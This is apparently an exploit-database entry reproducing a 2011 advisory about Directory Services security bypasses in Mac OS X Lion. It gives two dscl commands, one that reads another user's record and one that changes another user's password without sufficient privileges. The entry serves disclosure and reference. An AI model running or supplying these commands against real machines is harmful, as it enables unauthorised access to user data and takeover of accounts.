Apple Mac OSX (Lion) - Directory Services Security Bypass

Author: Defence in Depth
type: local
platform: osx
port: 
date_added: 2011-09-19 
date_updated: 2015-02-21 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/49676/info

Apple Mac OS X Lion is prone to multiple security-bypass vulnerabilities.

Local attackers can exploit these issues to obtain sensitive information or change the password of other users on the computer, without sufficient privileges.

$ dscl localhost -read /Search/Users/bob

$ dscl localhost -passwd /Search/Users/<username>